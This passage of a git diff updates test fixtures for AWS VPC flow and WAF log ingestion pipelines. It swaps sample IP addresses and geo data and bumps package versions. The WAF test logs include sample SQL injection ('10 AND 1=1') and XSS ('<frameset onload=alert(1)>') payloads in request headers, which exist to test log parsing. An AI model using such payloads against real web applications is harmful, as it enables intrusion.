0 1 4 336 1432917027 1432917142 ACCEPT OK", + "ingested": "2021-12-09T16:12:00.503416200Z", + "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK", "kind": "event", "start": "2015-05-29T16:30:27.000Z", "end": "2015-05-29T16:32:22.000Z", @@ -371,9 +425,27 @@ }, { "destination": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", "port": 0, - "address": "203.0.113.12", - "ip": "203.0.113.12" + "ip": "89.160.20.156" }, "source": { "address": "172.31.16.139", @@ -386,7 +458,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:cfQqw/Kh6+4yqhEKgkCw/m3WoJM=", + "community_id": "1:XiVZKra6oEtIAPBi9QgeQL4Hp6M=", "type": "ipv4", "bytes": 336, "iana_number": "1", @@ -405,12 +477,12 @@ "related": { "ip": [ "172.31.16.139", - "203.0.113.12" + "89.160.20.156" ] }, "event": { - "ingested": "2021-09-28T19:10:43.075122200Z", - "original": "2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK", + "ingested": "2021-12-09T16:12:00.503420100Z", + "original": "2 123456789010 eni-1235b8ca123456789 172.31.16.139 89.160.20.156 0 0 1 4 336 1432917094 1432917142 REJECT OK", "kind": "event", "start": "2015-05-29T16:31:34.000Z", "end": "2015-05-29T16:32:22.000Z", diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log index 6570debd565..94b874fa6a8 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log @@ -1,3 +1,3 @@ -3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 52.213.180.42 10.0.0.62 43416 5001 52.213.180.42 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK +3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 89.160.20.156 10.0.0.62 43416 5001 89.160.20.156 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK 3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - SKIPDATA 3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - NODATA \ No newline at end of file diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json index f6c047e28ae..cca3b2323c2 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json @@ -9,33 +9,33 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "IE-L", - "city_name": "Dublin", - "country_iso_code": "IE", - "country_name": "Ireland", - "region_name": "Leinster", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -6.2488, - "lat": 53.3338 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 16509, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "52.213.180.42", + "address": "89.160.20.156", "port": 43416, "bytes": 568, - "ip": "52.213.180.42", + "ip": "89.160.20.156", "packets": 8 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:HQ1oJYZ+9SJOoeju7badiLfvwls=", + "community_id": "1:dF5WY79X1yVncj+yH8q27Q5Bnpk=", "transport": "tcp", "type": "ipv4", "bytes": 568, @@ -57,13 +57,13 @@ }, "related": { "ip": [ - "52.213.180.42", + "89.160.20.156", "10.0.0.62" ] }, "event": { - "ingested": "2021-09-28T19:10:43.764548200Z", - "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 52.213.180.42 10.0.0.62 43416 5001 52.213.180.42 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK", + "ingested": "2021-12-09T16:12:01.346119700Z", + "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 89.160.20.156 10.0.0.62 43416 5001 89.160.20.156 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK", "kind": "event", "start": "2019-08-26T19:47:55.000Z", "end": "2019-08-26T19:48:53.000Z", @@ -77,7 +77,7 @@ "syn" ], "vpc_id": "vpc-abcdefab012345678", - "pkt_srcaddr": "52.213.180.42", + "pkt_srcaddr": "89.160.20.156", "type": "IPv4", "version": "3", "instance_id": "i-01234567890123456", @@ -106,7 +106,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-28T19:10:43.764574400Z", + "ingested": "2021-12-09T16:12:01.346125500Z", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - SKIPDATA", "kind": "event", "start": "2019-08-26T19:47:55.000Z", @@ -144,7 +144,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-28T19:10:43.764597700Z", + "ingested": "2021-12-09T16:12:01.346129200Z", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - NODATA", "kind": "event", "start": "2019-08-26T19:47:55.000Z", diff --git a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log index e741cc6f2bd..774353168e4 100644 --- a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log +++ b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log @@ -1,4 +1,4 @@ -{"timestamp":1576280412771,"formatVersion":1,"webaclId":"arn:aws:wafv2:ap-southeast-2:EXAMPLE12345:regional/webacl/STMTest/1EXAMPLE-2ARN-3ARN-4ARN-123456EXAMPLE","terminatingRuleId":"STMTest_SQLi_XSS","terminatingRuleType":"REGULAR","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"HEADER","matchedData":["10","AND","1"]}],"httpSourceName":"-","httpSourceId":"-","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"1.1.1.1","country":"AU","headers":[{"name":"Host","value":"localhost:1989"},{"name":"User-Agent","value":"curl/7.61.1"},{"name":"Accept","value":"*/*"},{"name":"x-stm-test","value":"10 AND 1=1"}],"uri":"/foo","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"rid"},"labels":[{"name":"value"}]} -{"timestamp":1592357192516,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9","terminatingRuleId":"Default_Action","terminatingRuleType":"REGULAR","action":"ALLOW","terminatingRuleMatchDetails":[],"httpSourceName":"-","httpSourceId":"-","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[{"ruleId":"TestRule","action":"COUNT","ruleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"HEADER","matchedData":["10","and","1"]}]}],"httpRequest":{"clientIp":"3.3.3.3","country":"US","headers":[{"name":"Host","value":"localhost:1989"},{"name":"User-Agent","value":"curl/7.61.1"},{"name":"Accept","value":"*/*"},{"name":"foo","value":"10 AND 1=1"}],"uri":"/foo","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"rid"},"labels":[{"name":"value"}]} -{"timestamp":1592361810888,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9","terminatingRuleId":"RG-Reference","terminatingRuleType":"GROUP","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"XSS","location":"HEADER","matchedData":["<","frameset"]}],"httpSourceName":"-","httpSourceId":"-","ruleGroupList":[{"ruleGroupId":"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b","terminatingRule":{"ruleId":"RuleA-XSS","action":"BLOCK","ruleMatchDetails":null},"nonTerminatingMatchingRules":[{"ruleId":"RuleB-SQLi","action":"COUNT","ruleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"HEADER","matchedData":["10","and","1"]}]}],"excludedRules":null}],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"3.3.3.3","country":"US","headers":[{"name":"Host","value":"localhost:1989"},{"name":"User-Agent","value":"curl/7.61.1"},{"name":"Accept","value":"*/*"},{"name":"xssfoo","value":""},{"name":"bar","value":"10 AND 1=1"}],"uri":"/foo","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"rid"},"labels":[{"name":"value"}]} -{"timestamp":1576280412771,"formatVersion":1,"webaclId":"arn:aws:wafv2:ap-southeast-2:12345:regional/webacl/test/111","terminatingRuleId":"STMTest_SQLi_XSS","terminatingRuleType":"REGULAR","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"UNKNOWN","matchedData":["10","AND","1"]}],"httpSourceName":"ALB","httpSourceId":"alb","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"requestHeadersInserted":null,"responseCodeSent":null,"httpRequest":{"clientIp":"1.1.1.1","country":"AU","headers":[],"uri":"","args":"","httpVersion":"HTTP/1.1","httpMethod":"POST","requestId":"null"},"labels":[{"name":"value"}]} \ No newline at end of file +{"timestamp":1576280412771,"formatVersion":1,"webaclId":"arn:aws:wafv2:ap-southeast-2:EXAMPLE12345:regional/webacl/STMTest/1EXAMPLE-2ARN-3ARN-4ARN-123456EXAMPLE","terminatingRuleId":"STMTest_SQLi_XSS","terminatingRuleType":"REGULAR","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"HEADER","matchedData":["10","AND","1"]}],"httpSourceName":"-","httpSourceId":"-","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"89.160.20.156","country":"AU","headers":[{"name":"Host","value":"localhost:1989"},{"name":"User-Agent","value":"curl/7.61.1"},{"name":"Accept","value":"*/*"},{"name":"x-stm-test","value":"10 AND 1=1"}],"uri":"/foo","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"rid"},"labels":[{"name":"value"}]} +{"timestamp":1592357192516,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9","terminatingRuleId":"Default_Action","terminatingRuleType":"REGULAR","action":"ALLOW","terminatingRuleMatchDetails":[],"httpSourceName":"-","httpSourceId":"-","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[{"ruleId":"TestRule","action":"COUNT","ruleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"HEADER","matchedData":["10","and","1"]}]}],"httpRequest":{"clientIp":"89.160.20.156","country":"US","headers":[{"name":"Host","value":"localhost:1989"},{"name":"User-Agent","value":"curl/7.61.1"},{"name":"Accept","value":"*/*"},{"name":"foo","value":"10 AND 1=1"}],"uri":"/foo","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"rid"},"labels":[{"name":"value"}]} +{"timestamp":1592361810888,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9","terminatingRuleId":"RG-Reference","terminatingRuleType":"GROUP","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"XSS","location":"HEADER","matchedData":["<","frameset"]}],"httpSourceName":"-","httpSourceId":"-","ruleGroupList":[{"ruleGroupId":"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b","terminatingRule":{"ruleId":"RuleA-XSS","action":"BLOCK","ruleMatchDetails":null},"nonTerminatingMatchingRules":[{"ruleId":"RuleB-SQLi","action":"COUNT","ruleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"HEADER","matchedData":["10","and","1"]}]}],"excludedRules":null}],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"89.160.20.156","country":"US","headers":[{"name":"Host","value":"localhost:1989"},{"name":"User-Agent","value":"curl/7.61.1"},{"name":"Accept","value":"*/*"},{"name":"xssfoo","value":""},{"name":"bar","value":"10 AND 1=1"}],"uri":"/foo","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"rid"},"labels":[{"name":"value"}]} +{"timestamp":1576280412771,"formatVersion":1,"webaclId":"arn:aws:wafv2:ap-southeast-2:12345:regional/webacl/test/111","terminatingRuleId":"STMTest_SQLi_XSS","terminatingRuleType":"REGULAR","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"UNKNOWN","matchedData":["10","AND","1"]}],"httpSourceName":"ALB","httpSourceId":"alb","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"requestHeadersInserted":null,"responseCodeSent":null,"httpRequest":{"clientIp":"89.160.20.156","country":"AU","headers":[],"uri":"","args":"","httpVersion":"HTTP/1.1","httpMethod":"POST","requestId":"null"},"labels":[{"name":"value"}]} \ No newline at end of file diff --git a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json index 1bc74f3bac2..b2240aa9ada 100644 --- a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json +++ b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json @@ -7,21 +7,24 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13335, + "number": 29518, "organization": { - "name": "Cloudflare, Inc." + "name": "Bredband2 AB" } }, - "ip": "1.1.1.1" + "ip": "89.160.20.156" }, "url": { "path": "/foo" @@ -48,7 +51,7 @@ }, "related": { "ip": [ - "1.1.1.1" + "89.160.20.156" ] }, "http": { @@ -60,8 +63,8 @@ }, "event": { "action": "BLOCK", - "ingested": "2021-10-11T15:00:35.544809626Z", - "original": "{\"timestamp\":1576280412771,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:ap-southeast-2:EXAMPLE12345:regional/webacl/STMTest/1EXAMPLE-2ARN-3ARN-4ARN-123456EXAMPLE\",\"terminatingRuleId\":\"STMTest_SQLi_XSS\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"AND\",\"1\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"1.1.1.1\",\"country\":\"AU\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"x-stm-test\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", + "ingested": "2021-12-09T16:12:01.711621Z", + "original": "{\"timestamp\":1576280412771,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:ap-southeast-2:EXAMPLE12345:regional/webacl/STMTest/1EXAMPLE-2ARN-3ARN-4ARN-123456EXAMPLE\",\"terminatingRuleId\":\"STMTest_SQLi_XSS\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"AND\",\"1\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"AU\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"x-stm-test\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ "access", @@ -102,18 +105,24 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.3451, - "lat": 47.6348 + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" } }, - "ip": "3.3.3.3" + "ip": "89.160.20.156" }, "url": { "path": "/foo" @@ -140,7 +149,7 @@ }, "related": { "ip": [ - "3.3.3.3" + "89.160.20.156" ] }, "http": { @@ -152,8 +161,8 @@ }, "event": { "action": "ALLOW", - "ingested": "2021-10-11T15:00:35.544814315Z", - "original": "{\"timestamp\":1592357192516,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"Default_Action\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"ALLOW\",\"terminatingRuleMatchDetails\":[],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[{\"ruleId\":\"TestRule\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"httpRequest\":{\"clientIp\":\"3.3.3.3\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"foo\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", + "ingested": "2021-12-09T16:12:01.711626900Z", + "original": "{\"timestamp\":1592357192516,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"Default_Action\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"ALLOW\",\"terminatingRuleMatchDetails\":[],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[{\"ruleId\":\"TestRule\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"foo\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ "access", @@ -200,18 +209,24 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.3451, - "lat": 47.6348 + "lon": 17.8167, + "lat": 59.2 } }, - "ip": "3.3.3.3" + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "ip": "89.160.20.156" }, "url": { "path": "/foo" @@ -238,7 +253,7 @@ }, "related": { "ip": [ - "3.3.3.3" + "89.160.20.156" ] }, "http": { @@ -250,8 +265,8 @@ }, "event": { "action": "BLOCK", - "ingested": "2021-10-11T15:00:35.544816392Z", - "original": "{\"timestamp\":1592361810888,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"RG-Reference\",\"terminatingRuleType\":\"GROUP\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"XSS\",\"location\":\"HEADER\",\"matchedData\":[\"\u003c\",\"frameset\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[{\"ruleGroupId\":\"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b\",\"terminatingRule\":{\"ruleId\":\"RuleA-XSS\",\"action\":\"BLOCK\",\"ruleMatchDetails\":null},\"nonTerminatingMatchingRules\":[{\"ruleId\":\"RuleB-SQLi\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"excludedRules\":null}],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"3.3.3.3\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"xssfoo\",\"value\":\"\u003cframeset onload=alert(1)\u003e\"},{\"name\":\"bar\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", + "ingested": "2021-12-09T16:12:01.711632900Z", + "original": "{\"timestamp\":1592361810888,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"RG-Reference\",\"terminatingRuleType\":\"GROUP\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"XSS\",\"location\":\"HEADER\",\"matchedData\":[\"\u003c\",\"frameset\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[{\"ruleGroupId\":\"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b\",\"terminatingRule\":{\"ruleId\":\"RuleA-XSS\",\"action\":\"BLOCK\",\"ruleMatchDetails\":null},\"nonTerminatingMatchingRules\":[{\"ruleId\":\"RuleB-SQLi\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"excludedRules\":null}],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"xssfoo\",\"value\":\"\u003cframeset onload=alert(1)\u003e\"},{\"name\":\"bar\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ "access", @@ -318,21 +333,24 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13335, + "number": 29518, "organization": { - "name": "Cloudflare, Inc." + "name": "Bredband2 AB" } }, - "ip": "1.1.1.1" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" @@ -356,7 +374,7 @@ }, "related": { "ip": [ - "1.1.1.1" + "89.160.20.156" ] }, "http": { @@ -368,8 +386,8 @@ }, "event": { "action": "BLOCK", - "ingested": "2021-10-11T15:00:35.544818361Z", - "original": "{\"timestamp\":1576280412771,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:ap-southeast-2:12345:regional/webacl/test/111\",\"terminatingRuleId\":\"STMTest_SQLi_XSS\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"UNKNOWN\",\"matchedData\":[\"10\",\"AND\",\"1\"]}],\"httpSourceName\":\"ALB\",\"httpSourceId\":\"alb\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"requestHeadersInserted\":null,\"responseCodeSent\":null,\"httpRequest\":{\"clientIp\":\"1.1.1.1\",\"country\":\"AU\",\"headers\":[],\"uri\":\"\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"POST\",\"requestId\":\"null\"},\"labels\":[{\"name\":\"value\"}]}", + "ingested": "2021-12-09T16:12:01.711639Z", + "original": "{\"timestamp\":1576280412771,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:ap-southeast-2:12345:regional/webacl/test/111\",\"terminatingRuleId\":\"STMTest_SQLi_XSS\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"UNKNOWN\",\"matchedData\":[\"10\",\"AND\",\"1\"]}],\"httpSourceName\":\"ALB\",\"httpSourceId\":\"alb\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"requestHeadersInserted\":null,\"responseCodeSent\":null,\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"AU\",\"headers\":[],\"uri\":\"\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"POST\",\"requestId\":\"null\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ "access", diff --git a/packages/aws/manifest.yml b/packages/aws/manifest.yml index 67df81b208f..c84f9a46679 100644 --- a/packages/aws/manifest.yml +++ b/packages/aws/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: aws title: AWS -version: 1.6.1 +version: 1.6.2 license: basic description: Collect logs and metrics from Amazon Web Services with Elastic Agent. type: integration diff --git a/packages/azure/changelog.yml b/packages/azure/changelog.yml index 2d3f1a1361e..78e15e8ce5f 100644 --- a/packages/azure/changelog.yml +++ b/packages/azure/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.12.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.12.0" changes: - description: Release azure package for v8.0.0 diff --git a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json index ddc1b7fd158..3807df486fa 100644 --- a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json +++ 